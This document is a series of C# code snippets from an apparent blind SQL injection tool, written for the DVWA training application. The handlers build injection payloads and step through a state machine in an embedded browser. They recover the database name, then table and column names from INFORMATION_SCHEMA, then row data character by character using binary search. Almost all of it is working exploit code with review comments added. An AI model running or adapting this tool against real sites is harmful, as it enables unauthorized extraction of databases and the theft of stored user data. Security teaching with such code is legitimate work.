Example #1
        /// <summary>
        /// Click handler that starts the database-name phase: raises the "run active"
        /// flags, stores the seed request text, lets <c>Handing</c> derive the next
        /// request from it, and hands that request to <c>PutData</c>.
        /// </summary>
        /// <param name="sender">Control that raised the event (unused).</param>
        /// <param name="e">Event data (unused).</param>
        private void button1_Click(object sender, EventArgs e)
        {
            // Seed text for the phase. It closes a quoted value and appends a boolean
            // condition on one character of SELECT DATABASE(), with a trailing MySQL-style
            // "#" comment. It only has an effect on a page that concatenates the parameter
            // into its SQL; a bound/parameterized query treats it as plain data.
            const string seedRequest = "1' AND ascii(lower(substring((SELECT DATABASE()), 0,1))) >= 127 #";

            btn_Click = true;
            Confirm.Is_Click_btnGDatabaseName = true;

            // The seed is stored before Change_Sql_Get_Next_Char runs; presumably that
            // helper reads Variable.Sql_Request as its starting point (confirm in Handing).
            Variable.Sql_Request = seedRequest;
            Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DB_Name);

            PutData(Variable.Sql_Request);

            // NOTE(review): the handler is named button1_Click but disables btn_GetDBName.
            btn_GetDBName.Enabled = false;
        }
 /// <summary>
 /// Forwards a classified response to <c>Handing.Respond</c>, choosing the
 /// <c>Mode</c>/<c>Mode_SQL</c> pair from the phase flags in <c>Confirm</c>.
 /// The first phase flag that is set wins, in the order database name, table
 /// names, column names, row data.
 /// </summary>
 /// <param name="result">Classification of the last response.</param>
 /// <param name="sql">Current request text; passed by reference to <c>Handing.Respond</c>.</param>
 /// <param name="left">Working value passed by reference to <c>Handing.Respond</c>.</param>
 /// <param name="right">Working value passed by reference to <c>Handing.Respond</c>.</param>
 /// <param name="mid">Working value passed by reference to <c>Handing.Respond</c>.</param>
 /// <param name="str_result">Accumulated result text; passed by reference to <c>Handing.Respond</c>.</param>
 /// <returns>
 /// Whatever <c>Handing.Respond</c> returns for the active phase, or
 /// <c>ResultRequest.Job.None</c> when no phase flag is set.
 /// </returns>
 public static ResultRequest.Job Get_Result_Respond(ResultRequest.Result result,
                                                    ref string sql, ref int left, ref int right, ref int mid, ref string str_result)
 {
     // Database name: always handled in String mode.
     if (Confirm.Is_Click_btnGDatabaseName)
     {
         return Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.DB_Name,
                                ref sql, ref left, ref right, ref mid, ref str_result);
     }

     // Table names: Number mode until the table count is done, String mode afterwards.
     if (Confirm.Is_Click_btnGNameTables)
     {
         return Confirm.Count_Tables_Done
             ? Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.TABLES_NAME,
                               ref sql, ref left, ref right, ref mid, ref str_result)
             : Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.TABLES_NAME,
                               ref sql, ref left, ref right, ref mid, ref str_result);
     }

     // Column names: same split, keyed on Find_Quantity_Done.
     if (Confirm.Is_Click_btnGNameColumns)
     {
         return Confirm.Find_Quantity_Done
             ? Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.COLUMNS_NAME,
                               ref sql, ref left, ref right, ref mid, ref str_result)
             : Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.COLUMNS_NAME,
                               ref sql, ref left, ref right, ref mid, ref str_result);
     }

     // Row data: String mode only once no per-table row-count flag is still false.
     if (Confirm.Is_Click_btnGetData)
     {
         bool rowCountsPending = Confirm.Find_Quantity_Row_Done.Contains(false);
         return rowCountsPending
             ? Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.DATA_TABLE,
                               ref sql, ref left, ref right, ref mid, ref str_result)
             : Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.DATA_TABLE,
                               ref sql, ref left, ref right, ref mid, ref str_result);
     }

     // No phase is active.
     return ResultRequest.Job.None;
 }
Example #3
        /// <summary>
        /// Click handler for the row-data phase. It is also re-entered through
        /// <c>btn_GetData.PerformClick()</c> from the document-completed handler, so each
        /// call performs one step of a state machine held in <c>Variable</c> and
        /// <c>Confirm</c>: either issue a <c>COUNT(*)</c> request for a table whose row
        /// count is still unknown, or move the table/row/column cursor to the next
        /// checked column and issue a character request for that cell.
        /// </summary>
        /// <remarks>
        /// The schema name <c>dvwa</c> is hard-coded in every request string (presumably
        /// the DVWA training application's database). Table and column names are
        /// concatenated into the request text without escaping. The requests only have an
        /// effect against a page that builds its SQL by string concatenation.
        /// </remarks>
        /// <param name="sender">Control that raised the event (unused).</param>
        /// <param name="e">Event data (unused).</param>
        private void btn_GetData_Click(object sender, EventArgs e)
        {
            if (Variable.Db_TablesName.Count != 0)         // table names have been collected
            {
                // NOTE(review): indexes Db_ColumnsName[0] without first checking that the
                // list is non-empty; confirm callers guarantee that.
                if (Variable.Db_ColumnsName[0].Count != 0) // column names have been collected
                {
                    btn_Click = true;
                    Confirm.Is_Click_btnGetData = true;

                    // Row counts are complete when the flag list is non-empty and holds no false entry.
                    if (Confirm.Find_Quantity_Row_Done.Count != 0 && !Confirm.Find_Quantity_Row_Done.Contains(false))
                    {
                        // First entry into the data phase: build the result store and reset the cursor.
                        if (Variable.Bd_DataTable.Count == 0)
                        {
                            Init_DataTable();
                            Variable.Index_Columns = Variable.Index_Rows = Variable.Index_Tables = 0;
                        }

                        // Advance the (table, row, column) cursor until it rests on a column
                        // that is checked in clb_ColsName, or until every table is exhausted.
                        while (true)
                        {
                            if (Variable.Index_Tables >= Variable.Quantity_Tables)
                            {
                                // Unused local; looks like a debugging aid for inspecting the collected data.
                                List <List <List <string> > > a = Variable.Bd_DataTable;

                                // All tables processed: reset the cursor and working values, then stop.
                                Variable.Index_Tables = Variable.Index_Columns = Variable.Index_Rows = 0;
                                Variable.Reset_Data_Variable();

                                return;
                            }
                            else
                            {
                                if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables])
                                {
                                    // Past the last column: wrap to the next row, and to the next table after the last row.
                                    Variable.Index_Columns = 0;
                                    Variable.Index_Rows++;
                                    if (Variable.Index_Rows >= Variable.Quantity_Row[Variable.Index_Tables])
                                    {
                                        Variable.Index_Rows = 0;
                                        Variable.Index_Tables++;
                                    }
                                }
                                // Column is not checked in the list box: skip it.
                                else if (!clb_ColsName.GetItemChecked(clb_ColsName.Items.IndexOf(Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns])))
                                {
                                    Variable.Index_Columns++;
                                }
                                else
                                {
                                    break;
                                }
                            }
                        }

                        // Seed request for the current cell. The column and table names were
                        // themselves read from earlier responses and are inserted verbatim.
                        Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT " + Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns] + " from dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + " LIMIT 0, 1), 0, 1))) >= 127 #";
                        if (Variable.Index_Tables < Variable.Quantity_Tables)
                        {
                            if (Variable.Index_Rows < Variable.Quantity_Row[Variable.Index_Tables])
                            {
                                if (Variable.Index_Columns < Variable.Quantity_Columns[Variable.Index_Tables])
                                {
                                    // Presumably Change_Sql_Get_Next_Char derives the next request from
                                    // the seed stored above (confirm in Handing).
                                    Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DATA_TABLE);

                                    PutData(Variable.Sql_Request);
                                }
                            }
                            else
                            {
                                // Unused local; no request is issued on this path.
                                List <List <List <string> > > a = Variable.Bd_DataTable;
                            }
                        }
                    }
                    else // row counts are not complete yet
                    {
                        if (Confirm.Find_Quantity_Row_Done.Count == 0)
                        {
                            // First call: create one "done" flag and one row counter per table.
                            for (int run = 0; run < Variable.Quantity_Tables; run++)
                            {
                                Confirm.Find_Quantity_Row_Done.Add(false);
                                Variable.Quantity_Row.Add(0);
                            }
                            Variable.Index_Tables = 0;
                            Variable.Str_result   = "";
                            // Row-count request for the first table.
                            Variable.Sql_Request  = "1' AND (SELECT COUNT(*) FROM dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + ") >= 127 #";

                            PutData(Variable.Sql_Request);
                        }
                        else
                        {
                            // Resume at the first table whose row count is still unknown.
                            for (int run = 0; run < Confirm.Find_Quantity_Row_Done.Count; run++)
                            {
                                if (Confirm.Find_Quantity_Row_Done[run] == false)
                                {
                                    Variable.Index_Tables = run;
                                    break;
                                }
                            }
                            // Row-count request for that table.
                            Variable.Str_result  = "";
                            Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + ") >= 127 #";

                            PutData(Variable.Sql_Request);
                        }
                    }
                }
            }
        }
Example #4
        /// <summary>
        /// Click handler for the column-name phase. It is re-entered through
        /// <c>btn_GetColsName.PerformClick()</c> (from this method and from the
        /// document-completed handler), and each call performs one step: while
        /// <c>Confirm.Find_Quantity_Done</c> is false it requests the column count of the
        /// current table; afterwards it requests the characters of the current column
        /// name, and once every table is processed it fills the UI lists and ends the phase.
        /// </summary>
        /// <remarks>
        /// The schema name <c>dvwa</c> is hard-coded and table names read from earlier
        /// responses are concatenated into the request text inside single quotes without
        /// escaping. The queries read <c>INFORMATION_SCHEMA.COLUMNS</c>, so they depend on
        /// the target's database account being able to read that metadata.
        /// </remarks>
        /// <param name="sender">Control that raised the event (unused).</param>
        /// <param name="e">Event data (unused).</param>
        private void btn_GetColsName_Click(object sender, EventArgs e)
        {
            // Nothing to do until the table count is known.
            if (Variable.Quantity_Tables != 0)
            {
                btn_Click = true;
                Confirm.Is_Click_btnGNameColumns = true;


                if (Confirm.Find_Quantity_Done) // column counts are known for every table
                {
                    // First entry: pre-size Db_ColumnsName with one empty string per expected column.
                    if (Variable.Db_ColumnsName.Count == 0)
                    {
                        for (int row = 0; row < Variable.Quantity_Tables; row++)
                        {
                            List <string> temp = new List <string>();
                            for (int col = 0; col < Variable.Quantity_Columns[row]; col++)
                            {
                                temp.Add("");
                            }
                            Variable.Db_ColumnsName.Add(temp);
                        }
                        Variable.Index_Columns = Variable.Index_Tables = 0;
                        Variable.Index_str     = 0;
                    }
                    // Leftover sample of the table-name request, kept for reference:
                    //ascii(lower(substring((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA LIKE 'dvwa' LIMIT 0, 1), 0, 1))) >= 127 #";

                    if (Variable.Index_Tables < Variable.Quantity_Tables)
                    {
                        // Seed request for the current table's column name.
                        Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE '" + Variable.Db_TablesName[Variable.Index_Tables] + "' LIMIT 0, 1), 0, 1))) >= 127 #";
                        if (Variable.Index_Columns < Variable.Quantity_Columns[Variable.Index_Tables])
                        {
                            // Presumably derives the next request from the seed stored above (confirm in Handing).
                            Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.COLUMNS_NAME);

                            PutData(Variable.Sql_Request);
                        }
                    }
                    else
                    {
                        // Every table processed: publish the collected names to the UI controls.
                        cmb_Tables.Items.Add("ALL");
                        foreach (string str in Variable.Db_TablesName)
                        {
                            cmb_TbsName.Items.Add(str);
                            cmb_Tables.Items.Add(str);
                        }
                        cmb_TbsName.SelectedIndex = 0;
                        cmb_Tables.SelectedIndex  = 0;

                        // Every column is added to the checked list box in the checked state.
                        foreach (List <string> ls in Variable.Db_ColumnsName)
                        {
                            foreach (string str in ls)
                            {
                                clb_ColsName.Items.Add(str, true);
                            }
                        }

                        // End of phase: clear the run flags and reset the cursor and working values.
                        // NOTE(review): this disables btn_GetTBsName, not btn_GetColsName; confirm that is intended.
                        btn_GetTBsName.Enabled = false;
                        btn_Click = false;
                        Variable.Index_Columns           = Variable.Index_Tables = 0;
                        Confirm.Is_Click_btnGNameColumns = false;
                        Variable.Reset_Data_Variable();

                        return;
                    }
                }
                else // column counts still being collected
                {
                    // First entry: one zeroed column counter per table.
                    if (Variable.Quantity_Columns.Count == 0)
                    {
                        Variable.Index_Tables = 0;
                        for (int run = 0; run < Variable.Quantity_Tables; run++)
                        {
                            Variable.Quantity_Columns.Add(0);
                        }
                    }
                    if (Variable.Index_Tables < Variable.Quantity_Tables)
                    {
                        // Leftover sample of the request with a fixed table name, kept for reference:
                        //sql = "1' AND (SELECT COUNT(*) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE 'guestbook') >= 127 #";
                        // Column-count request for the current table.
                        Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE '" + Variable.Db_TablesName[Variable.Index_Tables] + "') >= 127 #";

                        PutData(Variable.Sql_Request);
                    }
                    else // counts collected for every table
                    {
                        Confirm.Find_Quantity_Done = true;

                        Variable.Index_Tables  = 0;
                        Variable.Index_Columns = 0;
                        // Re-enter this handler, which now takes the name-collection branch.
                        btn_GetColsName.PerformClick();
                        return;
                    }
                }
            }
        }
Example #5
        /// <summary>
        /// Runs after the embedded browser finishes loading a document. It mirrors the
        /// URL and HTML into the form and, while a run is active (<c>btn_Click</c>),
        /// drives the extraction state machine. The response is classified by
        /// <c>Handing.GetResultSubmit</c>, the working values are updated by
        /// <c>Handing.Get_Result_Respond</c>, and the returned job state decides the next
        /// step: finish or advance the phase, append a completed part and request the next
        /// one, or resend the current request.
        /// </summary>
        /// <remarks>
        /// Each step ends either in <c>PutData</c> or in a <c>PerformClick()</c> on a phase
        /// button that in turn calls <c>PutData</c>. Presumably every step therefore
        /// produces one more page load, and a run appears to the target as a long series
        /// of similar requests; confirm against <c>PutData</c>.
        /// </remarks>
        /// <param name="sender">Control that raised the event (unused).</param>
        /// <param name="e">Event data (unused).</param>
        private void wbro_Brower_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
        {
            // Mirror the loaded page into the form's fields.
            txt_Url.Text = wbro_Brower.Url.ToString();
            html         = wbro_Brower.DocumentText;

            html_Document_Current = wbro_Brower.Document;

            // Only act on page loads that belong to an active run.
            if (btn_Click)
            {
                ResultRequest.Result result     = Handing.GetResultSubmit(html_Document_Current);
                ResultRequest.Job    work_state = ResultRequest.Job.None;

                int    left, mid, right, index;
                string str_result, sql;
                left       = mid = right = index = 0;
                str_result = sql = "";

                // Copy the shared working values into locals, let Handing update them, then store them back.
                Variable.Get_Data_Variable(ref left, ref mid, ref right, ref index, ref str_result, ref sql);

                work_state = Handing.Get_Result_Respond(result, ref sql, ref left, ref right, ref mid, ref str_result);

                Variable.Set_Data_Variable(left, mid, right, index, str_result, sql);

                // Done_ALL: the current item (count or full string) is finished.
                if (work_state == ResultRequest.Job.Done_ALL)
                {
                    if (Confirm.Is_Click_btnGDatabaseName)
                    {
                        // Database-name phase finished: clear the flags and reset the working values.
                        // Left/Right/Mid = 0/255/127 look like binary-search bounds over one byte
                        // (confirm in Handing.Respond).
                        Confirm.Is_Click_btnGDatabaseName = false;
                        btn_Click             = false;
                        btn_GetDBName.Enabled = false;
                        Variable.Left         = 0; Variable.Right = 255; Variable.Mid = 127; Variable.Index_str = 0;
                        Variable.Str_result   = "";
                        return;
                    }
                    else if (Confirm.Is_Click_btnGNameTables)
                    {
                        if (Confirm.Count_Tables_Done) // one table name finished
                        {
                            Variable.Index_str = 0;
                            if (Variable.Index_Tables < Variable.Quantity_Tables)
                            {
                                // Move to the next table and re-trigger the table-name handler.
                                Variable.Index_Tables++;
                                lbl_TBsName.Text += "     ";
                                Variable.Left     = 0; Variable.Right = 255; Variable.Mid = 127;
                                btn_GetTBsName.PerformClick();
                                return;
                            }
                            else // every table name finished
                            {
                                Variable.Index_str = 0;
                                Confirm.Is_Click_btnGNameTables = false;
                                btn_Click = false;

                                // NOTE(review): adds the list object itself as a single item rather
                                // than each table name; confirm whether that is intended.
                                cmb_TbsName.Items.Add(Variable.Db_TablesName);
                                return;
                            }
                        }
                        else
                        {
                            // Table count finished: Str_result holds the count as text.
                            // Convert.ToInt32 throws if that text is not a valid integer.
                            lbl_Count_TBsName.Text   += Variable.Str_result;
                            Variable.Quantity_Tables  = Convert.ToInt32(Variable.Str_result);
                            Confirm.Count_Tables_Done = true;

                            Variable.Reset_Data_Variable();

                            btn_GetTBsName.PerformClick();
                            return;
                        }
                    }
                    else if (Confirm.Is_Click_btnGNameColumns)
                    {
                        if (Confirm.Find_Quantity_Done)
                        {
                            // One column name finished: advance to the next column, wrapping to the next table.
                            Variable.Index_Columns++;
                            if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables])
                            {
                                Variable.Index_Columns = 0;
                                Variable.Index_Tables++;
                            }

                            Variable.Reset_Data_Variable();

                            btn_GetColsName.PerformClick();
                            return;
                        }
                        else
                        {
                            // Column count for the current table finished: store it and move to the next table.
                            Variable.Quantity_Columns[Variable.Index_Tables] = Convert.ToInt32(Variable.Str_result);
                            Variable.Str_result = "";
                            Variable.Index_Tables++;

                            Variable.Reset_Data_Variable();

                            btn_GetColsName.PerformClick();
                            return;
                        }
                    }
                    else if (Confirm.Is_Click_btnGetData)
                    {
                        if (Confirm.Find_Quantity_Row_Done.Contains(false)) // row counts still pending
                        {
                            // Row count for the current table finished: store it and mark the table done.
                            Variable.Quantity_Row[Variable.Index_Tables]          = Convert.ToInt32(Variable.Str_result);
                            Confirm.Find_Quantity_Row_Done[Variable.Index_Tables] = true;

                            Variable.Reset_Data_Variable();
                            btn_GetData.PerformClick();

                            return;
                        }
                        else
                        {
                            // One cell finished: advance column, then row, then table.
                            Variable.Index_Columns++;

                            if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables])
                            {
                                Variable.Index_Columns = 0;
                                Variable.Index_Rows++;
                                if (Variable.Index_Rows >= Variable.Quantity_Row[Variable.Index_Tables])
                                {
                                    Variable.Index_Rows = 0;
                                    Variable.Index_Tables++;
                                }
                            }
                            else
                            {
                                // Defined elsewhere; presumably skips unchecked columns (confirm).
                                Change_IndexCols_Whent_GetDataTable();
                            }
                            Variable.Reset_Data_Variable();
                            btn_GetData.PerformClick();
                            return;
                        }
                    }
                }
                // Done_OnePart: one piece of the current string is known. Append it to the
                // value being built and ask Handing for the next request.
                else if (work_state == ResultRequest.Job.Done_OnePart)
                {
                    if (Confirm.Is_Click_btnGDatabaseName)
                    {
                        lbl_Result_DBName.Text += Variable.Str_result;
                        Variable.Db_Name       += Variable.Str_result;

                        Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DB_Name);
                    }
                    else if (Confirm.Is_Click_btnGNameTables)
                    {
                        Variable.Db_TablesName[Variable.Index_Tables] += Variable.Str_result;
                        lbl_TBsName.Text    += Variable.Str_result;
                        Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.TABLES_NAME);
                    }
                    else if (Confirm.Is_Click_btnGNameColumns)
                    {
                        Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns] += Variable.Str_result;
                        Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.COLUMNS_NAME);
                    }
                    else if (Confirm.Is_Click_btnGetData)
                    {
                        Variable.Bd_DataTable[Variable.Index_Tables][Variable.Index_Rows][Variable.Index_Columns] += Variable.Str_result;
                        Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DATA_TABLE);

                        // Refresh the grid after every appended part.
                        dgv_Data.DataSource = Fill_Data_To_DataTable();
                    }
                    PutData(Variable.Sql_Request);
                }
                // Continue: the current part is not resolved yet. Send the request as stored
                // by Set_Data_Variable above.
                else if (work_state == ResultRequest.Job.Continue)
                {
                    PutData(Variable.Sql_Request);
                }
            }
        }